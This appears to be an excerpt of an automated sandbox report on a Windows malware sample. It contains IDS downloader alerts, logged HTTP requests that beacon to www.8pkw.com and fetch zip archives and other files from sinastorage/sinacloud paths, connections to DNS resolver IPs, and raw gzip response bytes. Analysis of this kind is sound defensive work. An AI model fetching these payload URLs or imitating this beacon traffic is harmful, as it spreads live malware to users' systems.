      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49922 -> 114.114.114.114:80
      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49986 -> 182.254.116.116:80
      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:50027 -> 119.29.29.29:80
      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:50009 -> 114.114.114.114:80
      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:50014 -> 114.114.114.114:80
      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49987 -> 114.114.114.114:80
      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49942 -> 114.114.114.114:80
      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:50026 -> 182.254.116.116:80
      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:50002 -> 119.29.29.29:80
      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:50001 -> 182.254.116.116:80
      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:50028 -> 114.114.114.114:80
      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:50047 -> 119.29.29.29:80
      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:50048 -> 114.114.114.114:80
      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:50046 -> 182.254.116.116:80
      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:50068 -> 182.254.116.116:80
      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:50067 -> 114.114.114.114:80
      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:50090 -> 119.29.29.29:80
      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:50084 -> 182.254.116.116:80
      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:50082 -> 114.114.114.114:80
      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:50088 -> 114.114.114.114:80
      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:50069 -> 119.29.29.29:80
      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:50089 -> 182.254.116.116:80
      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:50083 -> 119.29.29.29:80
      Source: global trafficHTTP traffic detected: GET /kss_api/io.php?a=uplog&apiver=905&c=0&gdata=1&softcode=1000011&&lgid=0&f=&x=91317019281 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSiE 6.0; Windows NT 5.1;)Accept-Language: en-chAccept-Encoding: gzip, deflateHost: www.8pkw.com:5566Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.baidu.comRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.sogou.comRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.so.comRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.sina.com.cnRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: www.baidu.comRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*Accept-Language: en-CHAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: shoufeifz.qijianfz.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/data.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinacloud.netRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/2024-12-05/21_22 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinacloud.netRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /style.css HTTP/1.1Accept: */*Referer: http://shoufeifz.qijianfz.com/Accept-Language: en-CHAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: shoufeifz.qijianfz.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/data.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinacloud.netRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/2024-12-05/21_22 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinacloud.netRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/data.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinacloud.netRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/2024-12-05/21_22 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinacloud.netRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/data.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinacloud.netRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/2024-12-05/21_22 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinacloud.netRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/data.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinastorage.comRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/2024-12-05/21_22 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinastorage.comRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/2024-12-05/21_22 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinastorage.comRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/data.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinastorage.comRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/2024-12-05/21_22 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinastorage.cnRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/data.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinastorage.cnRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/data.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinastorage.cnRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/2024-12-05/21_22 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinastorage.cnRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/vc8 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinastorage.comRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/vc8 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinastorage.comRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/vc8 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinastorage.cnRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/vc8 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinastorage.cnRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/vc8 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinacloud.netRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/vc8 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinacloud.netRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/vc8 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinacloud.netRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/vc8 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinacloud.netRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/s6paies HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinastorage.comRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/s6paies HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinastorage.comRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/s6paies HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinastorage.cnRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/s6paies HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinastorage.cnRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/s6paies HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinacloud.netRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/s6paies HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinacloud.netRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/s6paies HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinacloud.netRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/s6paies HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinacloud.netRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/o6saettr.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinastorage.cnRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/o6saettr.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinastorage.cnRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/o6saettr.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinacloud.netRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/o6saettr.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinacloud.netRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/o6saettr.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinacloud.netRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/o6saettr.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinacloud.netRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/o6saettr.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinastorage.comRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/o6saettr.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinastorage.comRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/c6tmassa HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinastorage.cnRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/c6tmassa HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinastorage.cnRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/c6tmassa HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinastorage.comRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/c6tmassa HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinastorage.comRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/c6tmassa HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinacloud.netRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/c6tmassa HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinacloud.netRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/c6tmassa HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinacloud.netRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/c6tmassa HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinacloud.netRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/l6tbasser.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinastorage.comRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/l6tbasser.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinastorage.comRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/l6tbasser.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinastorage.cnRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/l6tbasser.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinastorage.cnRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/l6tbasser.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinacloud.netRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/l6tbasser.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinacloud.netRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/l6tbasser.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinacloud.netRange: bytes=0-Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /question/l6tbasser.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Language: zh-CNAccept-Encoding: gzip, deflateHost: sinacloud.netRange: bytes=0-Connection: Keep-Alive
      Source: unknownTCP traffic detected without corresponding DNS query: 182.254.116.116
      Source: unknownTCP traffic detected without corresponding DNS query: 114.114.114.114
      Source: unknownTCP traffic detected without corresponding DNS query: 119.29.29.29
      Source: unknownTCP traffic detected without corresponding DNS query: 182.254.116.116
      Source: unknownTCP traffic detected without corresponding DNS query: 114.114.114.114
      Source: unknownTCP traffic detected without corresponding DNS query: 119.29.29.29
      Source: unknownTCP traffic detected without corresponding DNS query: 182.254.116.116
      Source: unknownTCP traffic detected without corresponding DNS query: 114.114.114.114
      Source: unknownTCP traffic detected without corresponding DNS query: 119.29.29.29
      Source: unknownTCP traffic detected without corresponding DNS query: 119.29.29.29
      Source: unknownTCP traffic detected without corresponding DNS query: 119.29.29.29
      Source: unknownTCP traffic detected without corresponding DNS query: 119.29.29.29
      Source: unknownTCP traffic detected without corresponding DNS query: 182.254.116.116
      Source: unknownTCP traffic detected without corresponding DNS query: 182.254.116.116
      Source: unknownTCP traffic detected without corresponding DNS query: 182.254.116.116
      Source: unknownTCP traffic detected without corresponding DNS query: 114.114.114.114
      Source: unknownTCP traffic detected without corresponding DNS query: 114.114.114.114
      Source: unknownTCP traffic detected without corresponding DNS query: 114.114.114.114
      Source: unknownTCP traffic detected without corresponding DNS query: 119.29.29.29
      Source: unknownTCP traffic detected without corresponding DNS query: 182.254.116.116
      Source: unknownTCP traffic detected without corresponding DNS query: 119.29.29.29
      Source: unknownTCP traffic detected without corresponding DNS query: 182.254.116.116
      Source: unknownTCP traffic detected without corresponding DNS query: 119.29.29.29
      Source: unknownTCP traffic detected without corresponding DNS query: 182.254.116.116
      Source: unknownTCP traffic detected without corresponding DNS query: 119.29.29.29
      Source: unknownTCP traffic detected without corresponding DNS query: 182.254.116.116
      Source: unknownTCP traffic detected without corresponding DNS query: 182.254.116.116
      Source: unknownTCP traffic detected without corresponding DNS query: 119.29.29.29
      Source: unknownTCP traffic detected without corresponding DNS query: 182.254.116.116
      Source: unknownTCP traffic detected without corresponding DNS query: 119.29.29.29
      Source: unknownTCP traffic detected without corresponding DNS query: 182.254.116.116
      Source: unknownTCP traffic detected without corresponding DNS query: 182.254.116.116
      Source: unknownTCP traffic detected without corresponding DNS query: 182.254.116.116
      Source: unknownTCP traffic detected without corresponding DNS query: 182.254.116.116
      Source: unknownTCP traffic detected without corresponding DNS query: 182.254.116.116
      Source: unknownTCP traffic detected without corresponding DNS query: 182.254.116.116
      Source: unknownTCP traffic detected without corresponding DNS query: 119.29.29.29
      Source: unknownTCP traffic detected without corresponding DNS query: 119.29.29.29
      Source: unknownTCP traffic detected without corresponding DNS query: 119.29.29.29
      Source: unknownTCP traffic detected without corresponding DNS query: 119.29.29.29
      Source: unknownTCP traffic detected without corresponding DNS query: 119.29.29.29
      Source: unknownTCP traffic detected without corresponding DNS query: 114.114.114.114
      Source: unknownTCP traffic detected without corresponding DNS query: 114.114.114.114
      Source: unknownTCP traffic detected without corresponding DNS query: 114.114.114.114
      Source: unknownTCP traffic detected without corresponding DNS query: 114.114.114.114
      Source: unknownTCP traffic detected without corresponding DNS query: 114.114.114.114
      Source: unknownTCP traffic detected without corresponding DNS query: 114.114.114.114
      Source: unknownTCP traffic detected without corresponding DNS query: 114.114.114.114
      Source: unknownTCP traffic detected without corresponding DNS query: 114.114.114.114
      Source: unknownTCP traffic detected without corresponding DNS query: 114.114.114.114
      Source: C:\Program Files (x86)\Google\D74384FB8D2C9.exeCode function: 2_2_6A6F283E InternetReadFile,InternetReadFile,_memset,_memset,2_2_6A6F283E
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: text/html;charset=utf-8Content-Encoding: gzipVary: Accept-EncodingServer: Microsoft-IIS/8.5X-Powered-By: PHP/5.2.17X-Powered-By: ASP.NETDate: Thu, 05 Dec 2024 13:25:11 GMTContent-Length: 143Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 07 60 1c 49 96 25 26 2f 6d ca 7b 7f 4a f5 4a d7 e0 74 a1 08 80 60 13 24 d8 90 40 10 ec c1 88 cd e6 92 ec 1d 69 47 23 29 ab 2a 81 ca 65 56 65 5d 66 16 40 cc ed 9d bc f7 de 7b ef bd f7 de 7b ef bd f7 ba 3b 9d 4e 27 f7 df ff 3f 5c 66 64 01 6c f6 ce 4a da c9 9e 21 80 aa c8 1f 3f 7e 7c 1f 3f 22 de 36 cd 2c 6b b3 9d 47 3f f3 68 97 fe 3f 6f db d5 a3 bb 77 e9 37 f9 df ff 03 32 72 70 8a 1f 00 00 00 Data Ascii: `I%&/m{JJt`$@iG#)*eVe]f@{{;N'?\fdlJ!?~|?"6,kG?h?ow72rp
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: text/htmlContent-Encoding: gzipLast-Modified: Thu, 05 Dec 2024 06:24:27 GMTAccept-Ranges: bytesETag: "e4101b56de46db1:0"Vary: Accept-EncodingServer: Microsoft-IIS/8.5Date: Thu, 05 Dec 2024 13:25:15 GMTContent-Length: 1349Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 07 60 1c 49 96 25 26 2f 6d ca 7b 7f 4a f5 4a d7 e0 74 a1 08 80 60 13 24 d8 90 40 10 ec c1 88 cd e6 92 ec 1d 69 47 23 29 ab 2a 81 ca 65 56 65 5d 66 16 40 cc ed 9d bc f7 de 7b ef bd f7 de 7b ef bd f7 ba 3b 9d 4e 27 f7 df ff 3f 5c 66 64 01 6c f6 ce 4a da c9 9e 21 80 aa c8 1f 3f 7e 7c 1f 3f 22 fe c7 bf f7 1f 7c fc bb ce aa 69 7b bd ca d3 79 bb 28 8f 7e e3 e4 31 7e a6 65 b6 bc f8 ec a3 7c f9 11 7f 92 67 33 fa 99 d2 f3 78 91 b7 59 3a 9d 67 75 93 b7 9f 7d f4 d5 9b 67 db 07 68 43 5f e9 77 cb 6c 91 7f f6 d1 65 91 5f ad aa ba fd 48 be 92 67 5a 2d db 7c 49 af 5d 15 b3 76 fe d9 2c bf 2c a6 f9 36 ff 31 4a d7 4d 5e 6f 37 d3 ac cc 26 65 fe d9 b2 1a a5 c5 b2 68 8b ac e4 0f f3 cf 76 c7 3b a3 74 91 bd 2b 16 eb 45 f0 11 35 0b 3e 0a d1 99 b7 ed 6a 3b ff 45 eb e2 f2 b3 8f 7e ef ed af 8e b7 4f aa c5 2a 6b 0b ea e4 23 87 50 91 7f 96 cf 2e 72 fb 6a 5b b4 65 7e f4 b4 9a ae 17 f4 fd e3 bb f2 b7 7e 59 16 cb b7 69 9d 97 9f 7d d4 b4 d7 65 de cc f3 bc fd 28 9d d7 f9 b9 7e 32 9e 36 0d 40 3d be ab 94 7b 3c a9 66 d7 f4 93 de 4e 1f cf 8a cb 74 5a 66 4d f3 d9 47 93 0b 34 a3 0f f9 79 bc c8 ea 5f b4 ce f3 74 92 cf b3 cb a2 aa 3f fb 28 2b db 